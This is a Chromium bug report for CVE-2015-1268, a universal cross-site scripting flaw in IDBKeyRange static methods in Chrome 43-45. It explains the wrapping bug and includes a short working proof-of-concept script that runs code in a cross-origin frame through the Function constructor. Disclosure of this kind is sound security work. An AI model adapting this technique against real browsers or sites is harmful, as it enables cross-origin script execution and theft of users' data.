CVE-2015-1268

Universal XSS using IDBKeyRange static methods

Reported by [email protected], May 31 2015

VULNERABILITY DETAILS

Calling an object-returning static method with a cross-origin object passed as |this| yields a return value wrapped in the cross-origin scope. This happens because FunctionCallbackInfo ends up with a cross-origin holder, and that holder is used as the creation context for the return value in blink::ScriptWrappable::wrap.

VERSION

Chrome 43.0.2357.81 (Release)
Chrome 44.0.2403.18 (Beta)
Chrome 45.0.2414.0 (Dev)
Chromium 45.0.2419.0 compiled today

REPRODUCTION CASE

<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
i.onload = function() {
  IDBKeyRange.only.call(frames[0],0).constructor.constructor('alert(location)')();
}
i.src = 'data:text/html,victim';
</script>

Link: https://bugs.chromium.org/p/chromium/issues/detail?id=494640